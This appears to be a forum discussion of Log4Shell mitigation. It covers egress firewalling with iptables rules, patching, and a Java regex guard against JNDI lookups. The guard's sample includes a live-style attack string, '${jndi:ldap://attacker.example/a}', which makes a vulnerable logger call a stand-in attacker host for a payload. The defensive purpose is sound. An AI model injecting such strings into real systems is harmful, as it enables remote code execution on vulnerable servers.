Stopping Log4J from weaponizing

It strikes me that the Log4J situation is bad; that cannot be overstated. But looking at how it can be weaponized and exploited, it got me thinking that many corporate servers (at least) should be immune to the flaw, or at least have enough added attack complexity to push the CVSS score well below 10.0, if those servers have no Internet connectivity.

I am a firm believer that you need to at least zone your servers and block them from accessing the Internet, even via proxy, unless there is an explicit reason for it. The same goes for not allowing recursive DNS queries out to the Internet, because that is a flow of data you are not controlling.

From experience, perhaps 0.001% of servers on corporate property genuinely need Internet access, and that access must be firewalled: point-to-point and protocol-explicit.
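A minimal sketch of that default-deny posture, assuming a Linux gateway running legacy iptables and entirely hypothetical addresses (a server VLAN of 10.20.0.0/24, one server 10.20.0.5 with a single approved flow to 203.0.113.10, and an internal resolver at 10.20.0.2):

```shell
# Default-deny everything the server VLAN tries to send out.
iptables -P FORWARD DROP

# One explicit, point-to-point, protocol-explicit exception (HTTPS only).
iptables -A FORWARD -s 10.20.0.5 -d 203.0.113.10 -p tcp --dport 443 \
         -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -s 203.0.113.10 -d 10.20.0.5 -p tcp --sport 443 \
         -m conntrack --ctstate ESTABLISHED -j ACCEPT

# No recursive DNS to the Internet: only the internal resolver may be queried.
iptables -A FORWARD -s 10.20.0.0/24 ! -d 10.20.0.2 -p udp --dport 53 -j DROP
iptables -A FORWARD -s 10.20.0.0/24 ! -d 10.20.0.2 -p tcp --dport 53 -j DROP
```

With rules along these lines, a vulnerable Log4j instance that tries to call back to an attacker's LDAP or DNS server simply has nowhere to go.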

Does anyone see a way that the Log4J flaws can be weaponized and then exploited without this connectivity? Yes, it would be a Band-Aid, but as a compensating control I think it should be in place anyway, to buy more time to test updated packages. And I do work for a corporation that is running around patching lots of things.
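To make the connectivity dependence concrete: the exploit only fires when attacker-controlled text containing a `${jndi:...}` lookup reaches a vulnerable logger, which then makes an outbound LDAP/RMI/DNS connection to fetch the payload. A hedged sketch, with a hypothetical `JndiGuard` class (string screening like this is NOT a real fix, since obfuscated bypasses exist and patching is the answer, but it shows exactly what has to get through to the logger):

```java
// Hypothetical pre-logging guard illustrating how Log4Shell is triggered:
// vulnerable Log4j versions interpret "${jndi:...}" sequences in any logged
// string, causing an outbound connection to an attacker-chosen server.
import java.util.regex.Pattern;

public class JndiGuard {
    // Case-insensitive match for the basic lookup trigger (illustrative only;
    // real attacks used nested "${lower:j}"-style obfuscation to evade this).
    private static final Pattern LOOKUP =
        Pattern.compile("\\$\\{\\s*jndi\\s*:", Pattern.CASE_INSENSITIVE);

    public static boolean looksLikeJndiLookup(String s) {
        return s != null && LOOKUP.matcher(s).find();
    }

    public static void main(String[] args) {
        // A typical malicious User-Agent header seen in the wild:
        String attack = "${jndi:ldap://attacker.example/a}";
        String benign = "Mozilla/5.0 (normal browser string)";
        System.out.println(looksLikeJndiLookup(attack));  // true
        System.out.println(looksLikeJndiLookup(benign));  // false
    }
}
```

If that outbound LDAP/RMI/DNS flow is blocked at the firewall, the lookup stalls and the remote class or payload never arrives, which is exactly the compensating control being argued for here.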

Another pain point I've seen, and one I've told people must change, is keeping old-yet-patched versions of software on the property; those need to move to a more current version posture. The success stories in Log4J remediation are coming from those who upgrade major versions often; their patching for this has been almost painless (or as low-pain as possible). Moving from 4.x of a product to 20.x drags more of an anchor behind it, with fears that the A (Availability) in the CIA triad will suffer.

Patching is still the message.




Modern systems design pretty much requires defense in depth. All internal servers (databases, mostly) should be isolated into their own network, with the only access to the outside being through a firewall or equivalent (such as a VPN). The issue is that, in the past, no one considered logging to be a dangerous thing to do, so it was added during development to aid the developers in debugging, and then never disabled or removed, just in case.

Log4j 2 may have suffered from a few bad lines of code, but it is also very well designed to do what it does: make and manage log files. It will rotate the old ones and log in whatever format you need, all very configurable, even on the fly. It's old, though, probably as old as Internet 1.0 (or older). Log4j 2 was a rewrite of the really old code, which had become unmaintained; as far as I know, the original never suffered from the current problems, which were added in the rewrite.
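For reference, the rotation and formatting flexibility described above is all driven by configuration. A minimal illustrative `log4j2.xml` (file names and sizes here are arbitrary examples) with a rolling, compressed, date-stamped log might look like:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <!-- Roll daily and at 10 MB; old files are gzipped with a date stamp. -->
    <RollingFile name="app" fileName="logs/app.log"
                 filePattern="logs/app-%d{yyyy-MM-dd}-%i.log.gz">
      <PatternLayout pattern="%d{ISO8601} [%t] %-5level %logger{36} - %msg%n"/>
      <Policies>
        <TimeBasedTriggeringPolicy/>
        <SizeBasedTriggeringPolicy size="10 MB"/>
      </Policies>
    </RollingFile>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="app"/>
    </Root>
  </Loggers>
</Configuration>
```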

My issue with all this is that people keep blaming it on Java. It's not Java's fault that the bug got written. It's not Java's fault that it is the most popular language in corporate development circles. It's not really even Java's fault that its bugs are easier to abuse, because it is so easily cross-platform. It's also not Java's fault that many corporate coders would rather reuse supposedly debugged, published, known-good code (all of Apache's libraries, for example) than chance writing their own with new bugs. (Java has Apache Maven, one of the first ecosystems to provide a relatively easy way to publish a shared bit of code for others to use. The idea has since become mainstream in all other languages, and something similar is even coming to C++ as modules.)
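As an illustration of that reuse model, pulling a patched Log4j 2 into a project via Maven is a few lines in `pom.xml` (the version below is an example of a post-Log4Shell patched release; always use the latest patched version):

```xml
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <!-- Example only: 2.17.1 is one of the releases that fixed Log4Shell. -->
  <version>2.17.1</version>
</dependency>
```

The flip side of that convenience, of course, is that one vulnerable library propagates into thousands of products, which is exactly what made the Log4J cleanup so broad.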